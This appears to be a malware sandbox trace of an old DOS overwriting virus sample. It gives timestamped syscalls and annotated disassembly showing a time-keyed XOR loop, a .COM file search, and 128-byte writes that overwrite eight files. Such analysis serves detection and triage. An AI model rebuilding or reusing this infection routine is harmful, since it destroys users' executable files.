Sample viewer

vx.netlux.org/Virus.DOS.Trivial.128.a


Syscalls:

Time Syscall Op Syscall Name
; Analyst notes: instruction window captured at the return from the "Get time" call (op 44 = 0x2C).
; It shows a one-byte XOR encoding loop (0x117 -> 0x18a), a file search, and an open-for-write;
; the window is cut off at "mov ah, 0x40", so the write calls appear only in the trace rows below.
; The trace logs no seek between Open and the two writes (23 + 105 = 128 bytes), which is consistent
; with the start of each matched file being overwritten -- the key triage indicator for this sample.
2018-12-17T22:46:42.866047944Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; DL returned by Get time (INT 21h/2Ch: hundredths of a second) is stored at [0x116] as the XOR key
0x12a62: mov si, 0x117    ; source = 0x117, the byte right after the key; 0x117 - 0x100 = 23, matching the 23-byte write (assuming a .COM image loaded at 0x100)
0x12a65: mov di, 0x18a    ; destination buffer at 0x18a (written through ES by stosb)
0x12a68: mov cx, 0x69    ; 0x69 = 105, the size of the second write logged below
0x12a6b: lodsb al, byte ptr [si]    ; loop top: fetch the next source byte
0x12a6c: xor al, byte ptr [0x116]    ; encode it with the time-derived key
0x12a70: stosb byte ptr es:[di], al    ; store the encoded byte in the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; exit only once CX has wrapped past zero, so 106 bytes are processed -- one more than the 105 written
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; AX comes from a push outside this window; the next int 0x21 is logged as op 78 (Find first), so AH is presumably 0x4E on this pass
0x12a78: xor cx, cx    ; CX = 0: attribute mask for the search
0x12a7a: mov dx, 0x17a    ; DX -> search pattern at 0x17a (its bytes are not shown; every file the trace reports is *.COM)
0x12a7d: int 0x21    ; logged as "Find first file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set (no match) -> 0x12aa8, outside this window
0x12a81: mov ax, 0x3d01    ; AH = 3Dh open, AL = 01h write-only access
0x12a84: mov dx, 0x9e    ; 0x9e = 0x80 + 0x1E: the file-name field of the default DTA in the PSP -- assumes the DTA was not relocated
0x12a87: int 0x21    ; logged as Open file 'SLEEP.COM'; no carry check is visible before the result is used
0x12a89: mov bx, ax    ; BX = value returned by open (the handle; an error code if the open failed)
0x12a8b: mov ah, 0x40    ; AH = 40h write; the rest of the call lies outside the captured window
2018-12-17T22:46:42.868877446Z 78 PC: 12a7f | Find first file
2018-12-17T22:46:42.875140049Z 61 PC: 12a89 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:42.881499704Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.888001844Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.891286502Z 62 PC: 12aa3 | Close file
; Analyst notes: second pass through the same window; the trace rows after it log Find next, then Open 'PRINT.COM'.
2018-12-17T22:46:42.905041989Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'PRINT.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:42.90762333Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:42.911667648Z 61 PC: 12a89 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:42.919894178Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.926519547Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.929641355Z 62 PC: 12aa3 | Close file
; Analyst notes: third pass through the same window; the trace rows after it log Find next, then Open 'HELLO.COM'.
2018-12-17T22:46:42.938561312Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'HELLO.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:42.941332515Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:42.945138428Z 61 PC: 12a89 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:42.951624603Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.958226993Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.961573478Z 62 PC: 12aa3 | Close file
; Analyst notes: fourth pass through the same window; the trace rows after it log Find next, then Open 'PHANG.COM'.
2018-12-17T22:46:42.969337206Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'PHANG.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:42.971795414Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:42.974930379Z 61 PC: 12a89 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:42.981854203Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.988539818Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.991470341Z 62 PC: 12aa3 | Close file
; Analyst notes: fifth pass through the same window; the trace rows after it log Find next, then Open 'PRINTA~1.COM'.
2018-12-17T22:46:43.000093815Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'PRINTA~1.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:43.002446653Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.005196799Z 61 PC: 12a89 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:43.020743672Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.027195207Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.029827526Z 62 PC: 12aa3 | Close file
; Analyst notes: sixth pass through the same window; the trace rows after it log Find next, then Open 'MANDEL.COM'.
2018-12-17T22:46:43.037761084Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'MANDEL.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:43.040150414Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.042886677Z 61 PC: 12a89 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:43.050958679Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.057625524Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.06022296Z 62 PC: 12aa3 | Close file
; Analyst notes: seventh pass through the same window; the trace rows after it log Find next, then Open 'PAH.COM'.
2018-12-17T22:46:43.068582512Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'PAH.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:43.070999445Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.074467054Z 61 PC: 12a89 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:43.081818194Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.088626478Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.091219325Z 62 PC: 12aa3 | Close file
; Analyst notes: eighth pass through the same window; the trace rows after it log Find next, then Open 'TEST.COM'.
2018-12-17T22:46:43.099684829Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in the trace
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> leave the loop (target outside window)
0x12a81: mov ax, 0x3d01    ; open, write-only
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21    ; logged as Open file 'TEST.COM'
0x12a89: mov bx, ax    ; BX = returned handle; no error check is visible
0x12a8b: mov ah, 0x40    ; write function selected; call continues outside the window
2018-12-17T22:46:43.102133044Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.109882475Z 61 PC: 12a89 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:43.117130479Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.119950572Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.122508159Z 62 PC: 12aa3 | Close file
; Analyst notes: final pass through the same window. The trace rows after it log Find next and then
; Display string at PC 12ab1 with no Open in between, so the jb at 0x12a7f appears to be taken here
; (search exhausted) and the open/write instructions listed below are shown but not reached on this pass.
2018-12-17T22:46:43.13065132Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl    ; key byte at [0x116] is rewritten from DL on every pass
0x12a62: mov si, 0x117    ; source starts right after the key byte
0x12a65: mov di, 0x18a    ; destination buffer
0x12a68: mov cx, 0x69    ; 0x69 = 105, size of the second write in earlier passes
0x12a6b: lodsb al, byte ptr [si]    ; fetch source byte
0x12a6c: xor al, byte ptr [0x116]    ; XOR with the key
0x12a70: stosb byte ptr es:[di], al    ; store to the buffer
0x12a71: dec cx
0x12a72: cmp cx, -1    ; loop ends after CX wraps, i.e. 106 iterations
0x12a75: jne 0x12a6b
0x12a77: pop ax    ; pushed outside this window; the next int 0x21 is logged as op 79 (Find next) on this pass
0x12a78: xor cx, cx    ; CX = 0
0x12a7a: mov dx, 0x17a    ; DX -> 0x17a (search pattern, contents not shown)
0x12a7d: int 0x21    ; logged as "Find next file" at PC 12a7f
0x12a7f: jb 0x12aa8    ; carry set -> 0x12aa8 (outside window); the following trace row is Display string at 12ab1
0x12a81: mov ax, 0x3d01    ; open, write-only (no Open is logged on this pass)
0x12a84: mov dx, 0x9e    ; file name in the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12a87: int 0x21
0x12a89: mov bx, ax    ; BX = value returned by open
0x12a8b: mov ah, 0x40    ; write function selected; window ends here
2018-12-17T22:46:43.133033974Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.138544384Z 9 PC: 12ab1 | Display string (String= 'T-1000')